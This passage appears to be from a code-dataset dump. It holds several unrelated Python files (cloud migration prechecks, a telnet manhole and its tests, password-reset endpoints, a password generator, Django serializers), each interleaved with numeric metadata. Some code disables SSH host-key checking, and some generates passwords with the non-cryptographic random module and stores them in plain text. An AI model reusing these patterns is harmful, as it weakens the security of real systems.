            title = game.opponent.title if game.opponent.title else "none"
            player_type = "computer" if title == "BOT" else "human"
    def report_game_result(self, game, board):
        # Pushes the final position to the engine via the protocol layer.
        self.engine.protocol._position(board)
| 29.486842
| 109
| 0.566934
| 528
| 4,482
| 4.660985
| 0.206439
| 0.056887
| 0.026412
| 0.026006
| 0.422999
| 0.369768
| 0.323446
| 0.222267
| 0.201138
| 0.168631
| 0
| 0.00197
| 0.320616
| 4,482
| 151
| 110
| 29.682119
| 0.80624
| 0
| 0
| 0.471074
| 0
| 0
| 0.041499
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.173554
| false
| 0.07438
| 0.057851
| 0.008264
| 0.297521
| 0.024793
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 1
|
86798d0504dd04df9298eafb92e49de14fb4653a
| 3,804
|
py
|
Python
|
cloudferry/actions/prechecks/check_vmax_prerequisites.py
|
SVilgelm/CloudFerry
|
4459c0d21ba7ccffe51176932197b352e426ba63
|
[
"Apache-2.0"
] | 6
|
2017-04-20T00:49:49.000Z
|
2020-12-20T16:27:10.000Z
|
cloudferry/actions/prechecks/check_vmax_prerequisites.py
|
SVilgelm/CloudFerry
|
4459c0d21ba7ccffe51176932197b352e426ba63
|
[
"Apache-2.0"
] | 3
|
2017-04-08T15:47:16.000Z
|
2017-05-18T17:40:59.000Z
|
cloudferry/actions/prechecks/check_vmax_prerequisites.py
|
SVilgelm/CloudFerry
|
4459c0d21ba7ccffe51176932197b352e426ba63
|
[
"Apache-2.0"
] | 8
|
2017-04-07T23:42:36.000Z
|
2021-08-10T11:05:10.000Z
|
# Copyright 2016 Mirantis Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import getpass
import logging
from cloudferry.lib.base import exception
from cloudferry.lib.base.action import action
from cloudferry.lib.utils import local
from cloudferry.lib.utils import remote_runner
LOG = logging.getLogger(__name__)
class CheckVMAXPrerequisites(action.Action):
    """This verifies prerequisites required for NFS to VMAX iSCSI cinder
    volume migration"""
    def _iscsiadm_is_installed_locally(self):
        """Abort the migration unless the iscsiadm CLI is usable locally."""
        LOG.info("Checking if iscsiadm tool is installed")
        try:
            # Probe by running the tool; failure means it is absent/broken.
            local.run('iscsiadm --help &>/dev/null')
        except local.LocalExecutionFailed:
            msg = ("iscsiadm is not available on the local host. Please "
                   "install iscsiadm tool on the node you running on or "
                   "choose other cinder backend for migration. iscsiadm is "
                   "mandatory for migrations with EMC VMAX cinder backend")
            LOG.error(msg)
            raise exception.AbortMigrationError(msg)
    def _check_local_sudo_password_set(self):
        """Abort when non-root, no sudo password configured, and passwordless
        sudo does not work."""
        current_user = getpass.getuser()
        if current_user != 'root' and \
                self.cfg.migrate.local_sudo_password is None:
            try:
                # Cheap command just to exercise sudo.
                local.sudo('ls')
            except local.LocalExecutionFailed:
                msg = ("CloudFerry is running as '{user}' user, but "
                       "passwordless sudo does not seem to be configured on "
                       "current host. Please either specify password in "
                       "`local_sudo_password` config option, or run "
                       "CloudFerry as root user.").format(user=current_user)
                LOG.error(msg)
                raise exception.AbortMigrationError(msg)
    def _ssh_connectivity_between_controllers(self):
        """Abort unless the source controller can ssh into the destination."""
        src_host = self.cfg.src.ssh_host
        src_user = self.cfg.src.ssh_user
        dst_host = self.cfg.dst.ssh_host
        dst_user = self.cfg.dst.ssh_user
        LOG.info("Checking ssh connectivity between '%s' and '%s'",
                 src_host, dst_host)
        rr = remote_runner.RemoteRunner(src_host, src_user)
        # Skip host-key prompts so the probe cannot hang interactively.
        ssh_opts = ('-o UserKnownHostsFile=/dev/null '
                    '-o StrictHostKeyChecking=no')
        cmd = "ssh {opts} {user}@{host} 'echo ok'".format(opts=ssh_opts,
                                                          user=dst_user,
                                                          host=dst_host)
        try:
            rr.run(cmd)
        except remote_runner.RemoteExecutionError:
            msg = ("No ssh connectivity between source host '{src_host}' and "
                   "destination host '{dst_host}'. Make sure you have keys "
                   "and correct configuration on these nodes. To verify run "
                   "'{ssh_cmd}' from '{src_host}' node")
            msg = msg.format(src_host=src_host, dst_host=dst_host, ssh_cmd=cmd)
            LOG.error(msg)
            raise exception.AbortMigrationError(msg)
    def run(self, **kwargs):
        """Run all prerequisite checks; no-op for non iscsi-vmax backends."""
        if self.cfg.dst_storage.backend != 'iscsi-vmax':
            return
        self._iscsiadm_is_installed_locally()
        self._ssh_connectivity_between_controllers()
        self._check_local_sudo_password_set()
| 41.347826
| 79
| 0.624869
| 457
| 3,804
| 5.056893
| 0.380744
| 0.021203
| 0.023799
| 0.02077
| 0.168758
| 0.064907
| 0.064907
| 0.064907
| 0
| 0
| 0
| 0.002985
| 0.295478
| 3,804
| 91
| 80
| 41.802198
| 0.859328
| 0.166404
| 0
| 0.177419
| 0
| 0
| 0.268974
| 0.023182
| 0
| 0
| 0
| 0
| 0
| 1
| 0.064516
| false
| 0.129032
| 0.096774
| 0
| 0.193548
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 1
|
86ab8849571d80e31e545baaa8fc3a7e45faa001
| 6,176
|
py
|
Python
|
tests/test_agent/test_manhole.py
|
guidow/pyfarm-agent
|
bb5d464f9f6549a3db3529a93e3d9f388b365586
|
[
"Apache-2.0"
] | null | null | null |
tests/test_agent/test_manhole.py
|
guidow/pyfarm-agent
|
bb5d464f9f6549a3db3529a93e3d9f388b365586
|
[
"Apache-2.0"
] | null | null | null |
tests/test_agent/test_manhole.py
|
guidow/pyfarm-agent
|
bb5d464f9f6549a3db3529a93e3d9f388b365586
|
[
"Apache-2.0"
] | null | null | null |
# No shebang line, this module is meant to be imported
#
# Copyright 2014 Oliver Palmer
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
from collections import namedtuple
from pprint import pprint
from random import randint
from StringIO import StringIO
from textwrap import dedent
try:
from unittest.mock import patch
except ImportError: # pragma: no cover
from mock import patch
from twisted.internet.protocol import ServerFactory
from twisted.cred.portal import Portal
from twisted.conch.telnet import (
ITelnetProtocol, TelnetBootstrapProtocol, TelnetTransport)
from pyfarm.agent.testutil import TestCase
from pyfarm.agent.manhole import (
LoggingManhole, TransportProtocolFactory, TelnetRealm,
manhole_factory, show)
# Lightweight stand-in for a Twisted peer address: a (host, port) pair.
Peer = namedtuple("Peer", ("host", "port"))
class FakeLoggingManhole(LoggingManhole):
    """Test double for LoggingManhole with canned terminal/transport attrs."""
    QUIT = False  # flipped by handle_QUIT (set on the instance, see below)
    GET_PEER_CALLS = 0  # counts transport.getPeer() invocations across tests
    class terminal(object):
        # Arrow-key codes the real terminal object would provide.
        RIGHT_ARROW, LEFT_ARROW = None, None
    class transport(object):
        @classmethod
        def getPeer(cls):
            # Random host string and port; bytes.encode("hex") implies this
            # module targets Python 2 (also StringIO import at file top).
            FakeLoggingManhole.GET_PEER_CALLS += 1
            return Peer(os.urandom(12).encode("hex"), randint(1024, 65535))
    def handle_QUIT(self):
        # NOTE(review): binds QUIT on the instance, shadowing the class attr;
        # tests resetting FakeLoggingManhole.QUIT rely on that distinction.
        self.QUIT = True
class TestManholeBase(TestCase):
    # Shared setUp: reset the global/class-level state mutated by tests
    # so each test starts from a clean slate.
    def setUp(self):
        TelnetRealm.NAMESPACE = None
        FakeLoggingManhole.GET_PEER_CALLS = 0
        FakeLoggingManhole.QUIT = False
class TestManholeFactory(TestManholeBase):
    # Tests for manhole_factory() and the telnet realm/protocol plumbing.
    def test_assertions(self):
        # manhole_factory requires (dict namespace, str username, str password).
        with self.assertRaises(AssertionError):
            manhole_factory(None, "", "")
        with self.assertRaises(AssertionError):
            manhole_factory({}, None, "")
        with self.assertRaises(AssertionError):
            manhole_factory({}, "", None)
    def test_instance_one(self):
        # Only one manhole may exist; a second call must raise.
        namespace = {"bob": None}
        username = os.urandom(32).encode("hex")
        password = os.urandom(32).encode("hex")
        manhole_factory(namespace, username, password)
        with self.assertRaises(AssertionError):
            manhole_factory(namespace, username, password)
    def test_instance(self):
        namespace = {"bob": None}
        username = os.urandom(32).encode("hex")
        password = os.urandom(32).encode("hex")
        manhole = manhole_factory(namespace, username, password)
        # The caller's namespace must not be mutated; the realm gets a
        # copy extended with the 'pp' and 'show' helpers.
        self.assertEqual(namespace, {"bob": None})
        self.assertEqual(
            TelnetRealm.NAMESPACE,
            {"bob": None, "pp": pprint, "show": show})
        self.assertIsInstance(manhole, ServerFactory)
        self.assertIsInstance(manhole.protocol, TransportProtocolFactory)
        self.assertIsInstance(manhole.protocol.portal, Portal)
        # There could be multiple password checkers, check for the one
        # we know we should have added.
        for _, instance in manhole.protocol.portal.checkers.items():
            found = False
            for user, passwd in instance.users.items():
                if user == username and passwd == password:
                    found = True
            if found:
                break
        else:
            self.fail("Failed to find correct username and password.")
    def test_request_avatar(self):
        # requestAvatar returns (interface, protocol, logout-callable).
        realm = TelnetRealm()
        avatar = realm.requestAvatar(None, ITelnetProtocol)
        self.assertEqual(len(avatar), 3)
        self.assertIs(avatar[0], ITelnetProtocol)
        self.assertIsInstance(avatar[1], TelnetBootstrapProtocol)
        self.assertTrue(callable(avatar[2]))
    def test_request_avatar_error(self):
        # Only ITelnetProtocol is supported by the realm.
        realm = TelnetRealm()
        with self.assertRaises(NotImplementedError):
            realm.requestAvatar(None, None)
    def test_protocol_factory(self):
        # Calling the factory must produce a TelnetTransport instance.
        factory = TransportProtocolFactory(None)
        transport = factory()
        self.assertIsInstance(transport, TelnetTransport)
class TestManholeShow(TestManholeBase):
    # Tests for the show() helper that is injected into the manhole
    # namespace.  Output is captured by patching sys.stdout.
    def test_uses_namespace(self):
        # show() with no argument lists the realm namespace contents.
        namespace = {"bob": None}
        username = os.urandom(32).encode("hex")
        password = os.urandom(32).encode("hex")
        manhole_factory(namespace, username, password)
        output = StringIO()
        with patch("sys.stdout", output):
            show()
        output.seek(0)
        output = output.getvalue().strip()
        self.assertEqual(output, "objects: ['bob', 'pp', 'show']")
    def test_custom_object(self):
        # show(obj) dumps the data attributes of the given object.
        class Foobar(object):
            a, b, c, d, e = True, 1, "yes", {}, 0.0
        output = StringIO()
        with patch("sys.stdout", output):
            show(Foobar)
        output.seek(0)
        output = output.getvalue().strip()
        self.assertEqual(
            output,
            dedent("""
            data attributes of <class 'tests.test_agent.test_manhole.Foobar'>
             a : True
             b : 1
             c : yes
             d : {} (0 elements)
             e : 0.0
            """).strip())
    def test_wrap_long_line(self):
        # Values longer than the line limit are truncated with '...'.
        class Foobar(object):
            a = " " * 90
        output = StringIO()
        with patch("sys.stdout", output):
            show(Foobar)
        output.seek(0)
        output = output.getvalue().strip()
        self.assertEqual(
            output,
            dedent("""
            data attributes of <class 'tests.test_agent.test_manhole.Foobar'>
             a : ' """ +
            """ '...
            """).strip())
class TestLoggingManhole(TestManholeBase):
    def test_line_received(self):
        # Typing 'exit' on a line must trigger handle_QUIT.
        f = FakeLoggingManhole()
        f.lineReceived("exit")
        self.assertTrue(f.QUIT)
| 32.505263
| 79
| 0.615771
| 647
| 6,176
| 5.812983
| 0.33694
| 0.018612
| 0.017549
| 0.02712
| 0.279713
| 0.250997
| 0.238235
| 0.238235
| 0.227067
| 0.227067
| 0
| 0.011322
| 0.284974
| 6,176
| 189
| 80
| 32.677249
| 0.840353
| 0.114475
| 0
| 0.316176
| 0
| 0
| 0.106221
| 0.014485
| 0
| 0
| 0
| 0
| 0.147059
| 1
| 0.095588
| false
| 0.073529
| 0.102941
| 0
| 0.286765
| 0.014706
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 1
|
86ae868b0b9598e5f2e99607cce26d99b3a34dc3
| 4,147
|
py
|
Python
|
vantage6/server/resource/recover.py
|
jaspersnel/vantage6-server
|
88ad40d23cc36eaba57c170929f7ccdd0011720a
|
[
"Apache-2.0"
] | 2
|
2020-10-19T08:59:08.000Z
|
2022-03-07T10:30:21.000Z
|
vantage6/server/resource/recover.py
|
jaspersnel/vantage6-server
|
88ad40d23cc36eaba57c170929f7ccdd0011720a
|
[
"Apache-2.0"
] | 67
|
2020-04-15T09:43:31.000Z
|
2022-03-18T08:29:17.000Z
|
vantage6/server/resource/recover.py
|
jaspersnel/vantage6-server
|
88ad40d23cc36eaba57c170929f7ccdd0011720a
|
[
"Apache-2.0"
] | 2
|
2021-01-21T15:09:26.000Z
|
2021-04-19T14:58:10.000Z
|
# -*- coding: utf-8 -*-
import logging
import datetime
from flask import request, render_template
from flask_jwt_extended import (
create_access_token,
decode_token
)
from jwt.exceptions import DecodeError
from flasgger import swag_from
from http import HTTPStatus
from pathlib import Path
from sqlalchemy.orm.exc import NoResultFound
from vantage6.common import logger_name
from vantage6.server import db
from vantage6.server.resource import (
ServicesResources
)
module_name = logger_name(__name__)
log = logging.getLogger(module_name)
def setup(api, api_base, services):
    """Register the password-recovery endpoints under <api_base>/recover.

    Adds the ResetPassword ('/reset') and RecoverPassword ('/lost')
    resources to *api*, forwarding *services* to each resource.
    """
    path = "/".join([api_base, module_name])
    log.info(f'Setting up "{path}" and subdirectories')

    # (resource class, route, endpoint name) for each POST endpoint.
    registrations = (
        (ResetPassword, path + '/reset', "reset_password"),
        (RecoverPassword, path + '/lost', 'recover_password'),
    )
    for resource, route, endpoint_name in registrations:
        api.add_resource(
            resource,
            route,
            endpoint=endpoint_name,
            methods=('POST',),
            resource_class_kwargs=services
        )
# ------------------------------------------------------------------------------
# Resources / API's
# ------------------------------------------------------------------------------
class ResetPassword(ServicesResources):
    """User can use a recovery token to reset their password."""

    @swag_from(str(Path(r"swagger/post_reset_password.yaml")),
               endpoint='reset_password')
    def post(self):
        """Set a new password for the user identified by a reset token.

        Expects a JSON body with "reset_token" and "password".  Returns
        400 when either field is missing or the token is invalid;
        200 on success.
        """
        body = request.get_json()
        reset_token = body.get("reset_token")
        password = body.get("password")
        if not reset_token or not password:
            return {"msg": "reset token and/or password is missing!"}, \
                HTTPStatus.BAD_REQUEST

        # obtain user id from the recovery token
        try:
            user_id = decode_token(reset_token)['identity'].get('id')
        except DecodeError:
            return {"msg": "Invalid recovery token!"}, HTTPStatus.BAD_REQUEST

        log.debug(user_id)
        user = db.User.get(user_id)
        # BUG FIX: a token may reference a user that no longer exists;
        # previously this crashed with an AttributeError on None.
        if not user:
            return {"msg": "Invalid recovery token!"}, HTTPStatus.BAD_REQUEST

        # set password
        user.set_password(password)
        user.save()

        log.info(f"Successfull password reset for '{user.username}'")
        return {"msg": "password successfully been reset!"}, \
            HTTPStatus.OK
class RecoverPassword(ServicesResources):
    """Send a mail containing a recovery token."""

    @swag_from(str(Path(r"swagger/post_recover_password.yaml")),
               endpoint='recover_password')
    def post(self):
        """Generate a recovery token and mail it to the account owner.

        Accepts "username" or "email" in the JSON body.  Always answers
        with the same message for existing and non-existing accounts so
        the endpoint cannot be used to probe which accounts exist.
        """
        # default return string
        # BUG FIX: message previously read "is our database" (missing "in").
        ret = {"msg": "If the username or email is in our database you "
                      "will soon receive an email"}

        # obtain username/email from request
        body = request.get_json()
        username = body.get("username")
        email = body.get("email")
        if not (email or username):
            return {"msg": "No username or email provided!"}, \
                HTTPStatus.BAD_REQUEST

        # find user in the database, if not here we stop!
        try:
            if username:
                user = db.User.get_by_username(username)
            else:
                user = db.User.get_by_email(email)
        except NoResultFound:
            # we do not tell them.... But we won't continue either
            return ret

        log.info(f"Password reset requested for '{user.username}'")

        # generate a short-lived token that can reset their password
        expires = datetime.timedelta(hours=1)
        reset_token = create_access_token(
            {"id": str(user.id)}, expires_delta=expires
        )

        self.mail.send_email(
            "password reset",
            sender="support@vantage6.ai",
            recipients=[user.email],
            text_body=render_template("mail/reset_password_token.txt",
                                      token=reset_token),
            html_body=render_template("mail/reset_password_token.html",
                                      token=reset_token)
        )
        return ret
| 30.718519
| 80
| 0.590306
| 459
| 4,147
| 5.187364
| 0.346405
| 0.033599
| 0.01008
| 0.01638
| 0.107518
| 0.094918
| 0.094918
| 0
| 0
| 0
| 0
| 0.002001
| 0.276827
| 4,147
| 134
| 81
| 30.947761
| 0.791931
| 0.15674
| 0
| 0.175824
| 0
| 0
| 0.180375
| 0.036075
| 0
| 0
| 0
| 0
| 0
| 1
| 0.032967
| false
| 0.21978
| 0.131868
| 0
| 0.252747
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 1
|
86d39cbeb38ed832359d8101e1462aeccc15eee8
| 1,400
|
py
|
Python
|
src/knownnodes.py
|
skeevey/PyBitmessage
|
196d688b138393d1d540df3322844dfe7e7c02ba
|
[
"MIT"
] | 1
|
2018-04-25T08:08:47.000Z
|
2018-04-25T08:08:47.000Z
|
src/knownnodes.py
|
skeevey/PyBitmessage
|
196d688b138393d1d540df3322844dfe7e7c02ba
|
[
"MIT"
] | null | null | null |
src/knownnodes.py
|
skeevey/PyBitmessage
|
196d688b138393d1d540df3322844dfe7e7c02ba
|
[
"MIT"
] | 1
|
2018-04-25T08:08:48.000Z
|
2018-04-25T08:08:48.000Z
|
import pickle
import threading
from bmconfigparser import BMConfigParser
import state
knownNodesLock = threading.Lock()
knownNodes = {}
knownNodesTrimAmount = 2000
def saveKnownNodes(dirName = None):
    """Pickle the in-memory knownNodes table into 'knownnodes.dat'.

    dirName defaults to the application data directory (state.appdata).
    """
    target = state.appdata if dirName is None else dirName
    with knownNodesLock, open(target + 'knownnodes.dat', 'wb') as output:
        pickle.dump(knownNodes, output)
def increaseRating(peer):
    """Raise *peer*'s rating by 0.1 in every stream, capped at 1.

    Streams where the peer is unknown are skipped silently.
    """
    step = 0.1
    ceiling = 1
    with knownNodesLock:
        for stream in knownNodes.keys():
            nodes = knownNodes[stream]
            try:
                nodes[peer]["rating"] = min(
                    nodes[peer]["rating"] + step, ceiling)
            except KeyError:
                # peer not present in this stream (or has no rating yet)
                continue
def decreaseRating(peer):
    """Lower *peer*'s rating by 0.1 in every stream, floored at -1.

    Streams where the peer is unknown are skipped silently.
    """
    step = 0.1
    floor = -1
    with knownNodesLock:
        for stream in knownNodes.keys():
            nodes = knownNodes[stream]
            try:
                nodes[peer]["rating"] = max(
                    nodes[peer]["rating"] - step, floor)
            except KeyError:
                # peer not present in this stream (or has no rating yet)
                continue
def trimKnownNodes(recAddrStream = 1):
    """Drop the oldest entries from a stream once it exceeds the
    configured "knownnodes"/"maxnodes" limit.

    recAddrStream: the stream number to trim (defaults to 1).
    """
    if len(knownNodes[recAddrStream]) < BMConfigParser().get("knownnodes", "maxnodes"):
        return
    with knownNodesLock:
        stream = knownNodes[recAddrStream]
        # BUG FIX: sorted() iterates the peer *keys* of the stream dict,
        # so the sort key must look each peer up to read its "lastseen"
        # timestamp; the original indexed the peer itself (x['lastseen']),
        # which fails because peers are not subscriptable by that key.
        oldestList = sorted(
            stream, key=lambda peer: stream[peer]['lastseen']
        )[:knownNodesTrimAmount]
        for oldest in oldestList:
            del stream[oldest]
| 30.434783
| 120
| 0.648571
| 134
| 1,400
| 6.776119
| 0.440299
| 0.079295
| 0.088106
| 0.114537
| 0.160793
| 0.160793
| 0.160793
| 0.160793
| 0.160793
| 0.160793
| 0
| 0.010496
| 0.251429
| 1,400
| 45
| 121
| 31.111111
| 0.855916
| 0
| 0
| 0.315789
| 0
| 0
| 0.047143
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.105263
| false
| 0.052632
| 0.105263
| 0
| 0.236842
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 1
|
86ef4e909fe2cea39d77e8fe80f71f1e8cdcd676
| 1,844
|
py
|
Python
|
main.py
|
Light-Lens/PassGen
|
8f4f2ef08299d6243b939d0f08ac75bde3cabf5e
|
[
"MIT"
] | 3
|
2021-07-19T16:39:06.000Z
|
2021-11-08T11:53:50.000Z
|
main.py
|
Light-Lens/PassGen
|
8f4f2ef08299d6243b939d0f08ac75bde3cabf5e
|
[
"MIT"
] | null | null | null |
main.py
|
Light-Lens/PassGen
|
8f4f2ef08299d6243b939d0f08ac75bde3cabf5e
|
[
"MIT"
] | null | null | null |
# PassGen
# These imports will be used for this project.
from colorama import Fore, Style
from colorama import init
import datetime
import string
import random
import sys
import os
# Initialize the console: set the window title (Windows 'title' shell
# command) and enable colorama auto-reset so colors don't bleed between
# prints.
os.system('title PassGen')
init(autoreset = True)
# Create Log Functions.
class LOG:
    """Console logging helpers; every message gets a timestamp prefix."""

    @staticmethod
    def _stamp():
        # Shared timestamp formatting for all log levels.
        return datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')

    @staticmethod
    def INFO_LOG(message):
        print(f"{LOG._stamp()} - INFO: {message}")

    @staticmethod
    def STATUS_LOG(message):
        print(f"{LOG._stamp()} - STATUS: {message}")

    @staticmethod
    def ERROR_LOG(message):
        print(Fore.RED + Style.BRIGHT + f"{LOG._stamp()} - ERROR: {message}")

    @staticmethod
    def WARN_LOG(message):
        print(Fore.YELLOW + Style.BRIGHT + f"{LOG._stamp()} - WARNING: {message}")
# This will Generate a Strong Password for the User!
def Generate(PassLen):
    """Return a random password of PassLen characters.

    Characters are drawn without repetition from ASCII letters, digits
    and punctuation (shuffled, then the first PassLen are taken).
    """
    pool = list(string.ascii_letters + string.digits + string.punctuation)
    random.shuffle(pool)
    return "".join(pool[:PassLen])
# Main script: generate one random password (5-17 chars), log it,
# append it to Password.log, then open that file.
LOG.WARN_LOG("Initialized PassGen!")
LOG.STATUS_LOG("Generating a Random Password for You.")
Password = Generate(random.randint(5, 17))
LOG.INFO_LOG(f"Your Password is: {Password}")
# Persist every generated password to a local log file.
with open("Password.log", "a") as File: File.write(f"{Password}\n")
# Open the log unless the first argument is "-o" (presumably "omit
# opening" — TODO confirm intended flag semantics).
if (len(sys.argv) == 1) or (len(sys.argv) > 1 and sys.argv[1].lower() != "-o"):
    os.system("start Password.log")  # 'start' is Windows-only
sys.exit() # Exiting the program successfully.
| 32.350877
| 80
| 0.691432
| 262
| 1,844
| 4.835878
| 0.408397
| 0.031571
| 0.066298
| 0.091555
| 0.211523
| 0.211523
| 0.211523
| 0.211523
| 0.211523
| 0.211523
| 0
| 0.004487
| 0.154013
| 1,844
| 56
| 81
| 32.928571
| 0.807692
| 0.186551
| 0
| 0.108108
| 0
| 0
| 0.238128
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.135135
| false
| 0.243243
| 0.189189
| 0
| 0.378378
| 0.108108
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 1
|
810e3e3e48092c408dee59bf8a6eb974e84689eb
| 1,475
|
py
|
Python
|
Final-Project/server/art/serializers.py
|
wendy006/Web-Dev-Course
|
2f0cfddb7ab4db88ffb4483c7cd4a00abf36c720
|
[
"MIT"
] | null | null | null |
Final-Project/server/art/serializers.py
|
wendy006/Web-Dev-Course
|
2f0cfddb7ab4db88ffb4483c7cd4a00abf36c720
|
[
"MIT"
] | null | null | null |
Final-Project/server/art/serializers.py
|
wendy006/Web-Dev-Course
|
2f0cfddb7ab4db88ffb4483c7cd4a00abf36c720
|
[
"MIT"
] | null | null | null |
from rest_framework import serializers
from .models import *
class CollectionSerializer(serializers.ModelSerializer):
    # Read/write serializer for Collection records.
    class Meta:
        model = Collection
        fields = ('collectionID', 'name', 'display_name', 'description', 'img_url')
class ArtSerializer(serializers.ModelSerializer):
    # URL fields are computed on the model, so expose them read-only.
    img_url = serializers.ReadOnlyField()
    thumb_url = serializers.ReadOnlyField()
    class Meta:
        model = Art
        fields = ('artID', 'title', 'filename', 'rarity', 'collection', 'img_url', 'thumb_url')
class UserSerializer(serializers.ModelSerializer):
    """Serializes user accounts; the password is accepted on input but
    never echoed back in responses (write_only)."""
    class Meta:
        model = User
        fields = ('id', 'username', 'email', 'password', 'coins', 'art')
        extra_kwargs = {
            'password': {'write_only': True}
        }
    def create(self, validated_data):
        """Create a user, hashing the plain-text password when given."""
        raw_password = validated_data.pop('password', None)
        user = self.Meta.model(**validated_data)
        if raw_password is not None:
            user.set_password(raw_password)
        user.save()
        return user
class OwnSerializer(serializers.ModelSerializer):
    # Ownership records; 'duplicates' is computed on the model.
    duplicates = serializers.ReadOnlyField()
    class Meta:
        model = Own
        fields = ('ownID', 'user', 'art', 'duplicates')
class SaleSerializer(serializers.ModelSerializer):
    # Marketplace listings linking seller, buyer and the artwork sold.
    class Meta:
        model = Sale
        fields = ('saleID', 'seller', 'buyer', 'ownership', 'art', 'price', 'available', 'sold', 'postDate', 'purchaseDate')
| 35.97561
| 124
| 0.626441
| 136
| 1,475
| 6.698529
| 0.5
| 0.059276
| 0.076839
| 0.115258
| 0.215148
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.247458
| 1,475
| 41
| 124
| 35.97561
| 0.820721
| 0
| 0
| 0.142857
| 0
| 0
| 0.168524
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.028571
| false
| 0.142857
| 0.057143
| 0
| 0.485714
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 1
|
d4cd43090d9af44b579f4587a49e6d83acfe093a
| 807
|
py
|
Python
|
src/dataclay/util/logs.py
|
kpavel/pyclay
|
275bc8af5c57301231a20cca1cc88556a9c84c79
|
[
"BSD-3-Clause"
] | 1
|
2020-04-16T17:09:15.000Z
|
2020-04-16T17:09:15.000Z
|
src/dataclay/util/logs.py
|
kpavel/pyclay
|
275bc8af5c57301231a20cca1cc88556a9c84c79
|
[
"BSD-3-Clause"
] | 35
|
2019-11-06T17:06:16.000Z
|
2021-04-12T16:27:20.000Z
|
src/dataclay/util/logs.py
|
kpavel/pyclay
|
275bc8af5c57301231a20cca1cc88556a9c84c79
|
[
"BSD-3-Clause"
] | 1
|
2020-05-06T11:28:16.000Z
|
2020-05-06T11:28:16.000Z
|
""" Class description goes here. """
import json
import logging
class JSONFormatter(logging.Formatter):
    """Simple JSON formatter for the logging facility."""

    def format(self, obj):
        """Return *obj* (a LogRecord instance) serialized as JSON."""
        record = dict(obj.__dict__)
        # Interpolate the lazy %-style message before serializing.
        record["message"] = record.pop("msg") % record.pop("args")
        # exc_info holds a traceback object which is not JSON-serializable;
        # replace it with formatted text when an exception is attached.
        ei = record.pop("exc_info", None)
        if ei is not None:
            record["exc_info"] = self.formatException(ei)
        return json.dumps(record, skipkeys=True)
| 26.032258
| 70
| 0.581165
| 95
| 807
| 4.873684
| 0.621053
| 0.038877
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.319703
| 807
| 30
| 71
| 26.9
| 0.843352
| 0.327138
| 0
| 0
| 0
| 0
| 0.057471
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.0625
| false
| 0.0625
| 0.125
| 0
| 0.3125
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 1
|
be2a32ef4dd37c381a36c7a58f2812962caeb4d5
| 502
|
py
|
Python
|
logger_application/logger.py
|
swatishayna/OnlineEDAAutomation
|
a1bfe8b1dee51a4872529a98f6e1136922329e3e
|
[
"MIT"
] | 1
|
2022-03-24T20:26:44.000Z
|
2022-03-24T20:26:44.000Z
|
logger_application/logger.py
|
